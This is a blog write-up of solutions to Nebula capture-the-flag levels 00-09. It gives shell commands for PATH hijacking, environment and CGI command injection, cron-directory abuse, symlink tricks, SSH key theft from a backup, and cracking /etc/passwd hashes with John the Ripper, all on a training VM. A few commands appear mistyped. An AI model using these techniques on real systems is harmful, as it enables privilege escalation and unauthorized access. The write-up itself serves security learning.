Nebula Shell Exploits (Solutions 00-09)

Shell-based exploit exercises

Published on 22 June 2012


Nebula is a series of “capture the flag” exercises from Exploit Exercises. I’ve been reading Hacking: The Art of Exploitation 2e – this was a good supplement.

The provided Ubuntu VM has 20 levels (00 - 19). The goal of each level is to run the getflag command on a target account, either by exploiting a suid program or obtaining the password.


To keep things shorter, a link to the full description is provided with each level. The full description contains relevant source code.

There’s no copy paste for Ubuntu Server VMs, but I included the output when it supplemented the solution.

Level 0

Description (full): Find a file with setuid permissions.

$ find / -perm /u+s

Search the root directory for files based on permissions. The file /bin/.../flag00 looks suspicious.

Level 1

Description (full): Given a program that calls /usr/bin/env echo and now what?, execute an arbitrary program.

$ export PATH=~:$PATH
$ /bin/echo "whoami; getflag" > ~/echo
$ chmod a+x ~/echo
$ /home/flag01/flag01

env looks in the PATH variable to find a program to run. Adding an executable named echo to an earlier directory in the path will execute the program.

Level 2

Description (full): Given a program that calls /bin/echo $USER, execute an arbitrary program.

$ export USER="hi echoing; whoami; getflag"
$ /home/flag02/flag02
about to call system("/bin/echo hi echoing; whoami; getflag is cool")
hi echoing
You have successfully executed getflag on target account

Level 3

Description (full): There is a cron job that runs occasionally. In the home directory, there is a and a writable.d/.

$ cd /home/flag03
$ ls

$ # ./ runs a for loop with "bash -x $i" for i in writable.d/*
$ echo "whoami" > /tmp/log; getflag >> /tmp/log" > ./writable.d/foo
$ # Wait a few minutes for the cron job
$ cat /tmp/log
You have successfully executed getflag on target account

Since cron jobs don’t write output to stdout, the output should be logged in a file.

Level 4

Description (full): The program flag04 dumps the contents of a file to stdout, unless there is a substring match with the string "token". Examine the file /home/flag04/token/.

$ cd /tmp/
$ ln -s /home/flag04/ ./foo
$ cd /home/flag04/
$ ./flag04 /tmp/foo

token contains the password to the flag04 account. su flag04 and capture the flag.

Level 5

Description (full): Exploit the directory permissions in /home/flag05/.

$ cd /home/flag05
$ ls -la
$ `/home/flag05` contains `.ssh` (unreadable) and `.backup` (execute access!) directories
$ ls .backup
$ # tar tzf backup-19072011.tgz shows that it contains the .ssh directory
$ cd .backup
$ tar xzf backup-19072011.tgz -C ~
$ cd ~/.ssh
$ ssh -i id_rsa flag05@localhost
flag05@nebula:~$ getflag

The -C flag for tar switches directories before unarchiving. We then ssh to our own machine, but this time as flag05.

Level 6

Description (full): The flag06 account credentials are from a legacy UNIX system.

Account credentials points toward /etc/passwd:

$ cat /etc/passwd/ |  grep flag06

According to the Internet, older UNIX systems stored the salted, hashed passwords in /etc/passwd. Now, these are placed in the no-read /etc/shadow/ (or a variant). The flag06 is a one way hash, but John the Ripper can crack it. No special permissions are required to use it.

$ cd ~
$ wget
$ tar xzf john-1.7.9.tar.gz
$ cd john-1.7.9.tar.gz/src
$ make clean linux-x86-sse2
$ cd ../run
$ ./john /etc/passwd
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello             (flag06)
$ su flag06
sh-4.2$ getflag

Level 7

Description (full): A Perl CGI script attempts to ping a given host.

$ cd /home/flag07
$ perl index.cgi Host=" | getflag"
$ # Yields a "getflag is executing on a non-flag account, this doesn't count"
$ cat thttpd.conf | grep flag07
$ ps aux | grep thttpd
$ # Interestingly, two thttpd web server instances are running on flag07 and flag16
$ cat thttpd.conf | grep port=
$ cd ~ && wget localhost:7007/index.cgi --post-data=" | getflag"
$ cat index.cgi
<html><head><title>Ping results</title></head><body><pre>You have successfully executed getflag on a target account</pre></body></html>

If we run the script with perl, getflag still runs as the level07 user. The vulnerability exists in thttpd.conf, which runs commands as flag07 (user=flag07). Capturing the flag requires using thttpd.conf.

ps aux shows that a web server using thttpd is running. Using wget localhost:7007/index.cgi, the parameter is passed in as the flag07 user.

Level 8

Description (full): Examine a capture.pcap file to see what flag08 was doing.

$ cd /home/flag08
$ # -X prints in ASCII; -q removes extraneous information, -r points to a file
$ tcpdump -X -q -r capture.pcap | less

After mucking around with tcpdump in ASCII mode, however, it’s clear that the output is still unintelligible. The Internet (broadly speaking) suggests Wireshark (and its command line counterpart, tshark) to examine packets, but the virtual machine doesn’t have these. However, a program named tcpflow is available.

$ # -c prints to stdout, -r points to a file
$ tcpflow -c -r capture.pcap | less

After the Password: prompt, the flag08 user typed “backdoor…00Rm8.ate”. A few tries for su flag08 with backdoor and backdoor...00Rm8.ate are unsuccessful. But if we believe that:

  1. the password is based on words
  2. each packet represents a key press to the server “Backdoor mate” could be backdoorm8, backd00Rm8, etc. If the period represents deletion, then the password is backd00Rmate.
$ su flag08
sh-4.2$ getflag

Level 9

Description (full): Exploit a C wrapper for a PHP script. The PHP script uses one argument but accepts a second, unused one – $useme.

$ cd ~
$ echo "[email {\$use_me(getflag)}]" > foo
$ /home/flag09/flag09 ./foo exec
You have successfully executed getflag on target account

This exploits PHP’s “variable of variables.” Executing flag09 ~/foo system also works.
